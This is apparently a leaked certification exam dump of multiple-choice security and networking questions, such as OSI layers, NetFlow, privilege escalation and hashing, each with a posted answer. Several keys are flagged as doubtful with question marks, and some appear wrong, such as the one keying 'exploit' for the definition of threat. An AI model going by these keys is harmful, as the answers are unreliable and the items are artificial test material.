A. Being the cause of a distributed reflection denial of service attack.
B. Users changing the time settings on their systems.
C. A critical server may not have the correct time synchronized.
D. Watching for rogue devices that have been added to the network.

HIDE ANSWERS
Correct Answer: A

Which protocol is primarily supported by the third layer of the Open Systems
Interconnection reference model?

08/09/2017 – by Mod_GuideK 0
Which protocol is primarily supported by the third layer of the Open Systems Interconnection
reference model?
A. HTTP/TLS
B. IPv4/IPv6
C. TCP/UDP
D. ATM/ MPLS

HIDE ANSWERS
Correct Answer: B

Which term represents a potential danger that could take advantage of a weakness in a
system?

08/09/2017 – by Mod_GuideK 16

Which term represents a potential danger that could take advantage of a weakness in a system?
A. vulnerability
B. risk
C. threat
D. exploit

HIDE ANSWERS
Correct Answer: D (C????)

Which security principle states that more than one person is required to perform a critical
task?

08/09/2017 – by Mod_GuideK 1

Which security principle states that more than one person is required to perform a critical task?
A. due diligence
B. separation of duties
C. need to know
D. least privilege

HIDE ANSWERS
Correct Answer: B

Which main purpose of this framework is true?

08/09/2017 – by Mod_GuideK 3
You must create a vulnerability management framework. Which main purpose of this framework
is true?
A. Conduct vulnerability scans on the network.
B. Manage a list of reported vulnerabilities.
C. Identify remove and mitigate system vulnerabilities.
D. Detect and remove vulnerabilities in source code.

HIDE ANSWERS
Correct Answer: C

Which information is the term PHI used to describe?

08/09/2017 – by Mod_GuideK 0

In computer security, which information is the term PHI used to describe?

A. private host information
B. protected health information
C. personal health information
D. protected host information

HIDE ANSWERS
Correct Answer: B

Which event occurs when a signature-based IDS encounters network traffic that triggers
an alert?

08/09/2017 – by Mod_GuideK 0

Which event occurs when a signature-based IDS encounters network traffic that triggers an alert?
A. connection event
B. endpoint event
C. NetFlow event
D. intrusion event

HIDE ANSWERS
Correct Answer: D

Which data can be obtained using NetFlow?

08/09/2017 – by Mod_GuideK 0

Which data can be obtained using NetFlow?

A. session data
B. application logs
C. network downtime
D. report full packet capture

HIDE ANSWERS
Correct Answer: A

Which term describes the act of a user, without authority or permission, obtaining rights
on a system, beyond what were assigned?

08/09/2017 – by Mod_GuideK 0

Which term describes the act of a user, without authority or permission, obtaining rights on a
system, beyond what were assigned?
A. authentication tunneling
B. administrative abuse
C. rights exploitation
D. privilege escalation

HIDE ANSWERS
Correct Answer: D

Which cause of this problem is true?

08/09/2017 – by Mod_GuideK 2

Refer to the exhibit. A TFTP server has recently been installed in the Atlanta office. The network
administrator is located in the NY office and has attempted to make a connection to the TFTP
server. They are unable to backup the configuration file and Cisco IOS of the NY router to the
TFTP server
Which cause of this problem is true?
A. The TFTP server cannot obtain an address from a DHCP Server.
B. The TFTP server has an incorrect IP address.
C. The network administrator computer has an incorrect IP address
D. The TFTP server has an incorrect subnet mask.

HIDE ANSWERS
Correct Answer: A (B???)

hich definition of a daemon on Linux is true?

08/09/2017 – by Mod_GuideK 0

Which definition of a daemon on Linux is true?

A. error check right after the call to fork a process
B. new process created by duplicating the calling process
C. program that runs unobtrusively in the background
D. set of basic CPU instructions

HIDE ANSWERS
Correct Answer: C

Which definition of vulnerability is true?

08/09/2017 – by Mod_GuideK 0

Which definition of vulnerability is true?

A. an exploitable unpatched and unmitigated weakness in software
B. an incompatible piece of software
C. software that does not have the most current patch applied
D. software that was not approved for installation

HIDE ANSWERS
Correct Answer: A

Which option is an advantage to using network-based anti-virus versus host-based anti-

virus?

08/09/2017 – by Mod_GuideK 7

Which option is an advantage to using network-based anti-virus versus host-based anti- virus?
A. Network-based has the ability to protect unmanaged devices and unsupported operating
systems.
B. There are no advantages compared to host-based antivirus.
C. Host-based antivirus does not have the ability to collect newly created signatures.
D. Network-based can protect against infection from malicious files at rest.

HIDE ANSWERS
Correct Answer: A (D???)

Which evasion method involves performing actions slower than normal to prevent
detection?

08/09/2017 – by Mod_GuideK 3

Which evasion method involves performing actions slower than normal to prevent detection?
A. traffic fragmentation
B. tunneling
C. timing attack
D. resource exhaustion

HIDE ANSWERS
Correct Answer: C (A???)

Which hashing algorithm is the least secure?

08/09/2017 – by Mod_GuideK 3

Which hashing algorithm is the least secure?

A. MD5
B. RC4
C. SHA-3
D. SHA-2

HIDE ANSWERS
Correct Answer: A

Which protocol is expected to have NTP a user agent, host, and referrer headers in a
packet capture?

08/09/2017 – by Mod_GuideK 8

Which protocol is expected to have NTP a user agent, host, and referrer headers in a packet
capture?
A. NTP
B. HTTP
C. DNS
D. SSH

HIDE ANSWERS
Correct Answer: B

Which definition of permissions in Linux is true?

08/09/2017 – by Mod_GuideK 1

Which definition of permissions in Linux is true?

A. rules that allow network traffic to go in and out B. table maintenance program
C. written affidavit that you have to sign before using the system
D. attributes of ownership and control of an object

HIDE ANSWERS
Correct Answer: D

Which definition of a process in Windows is true?

08/09/2017 – by Mod_GuideK 0

Which definition of a process in Windows is true?

A. running program
B. unit of execution that must be manually scheduled by the application
C. database that stores low-level settings for the OS and for certain applications
D. basic unit to which the operating system allocates processor time

HIDE ANSWERS
Correct Answer: A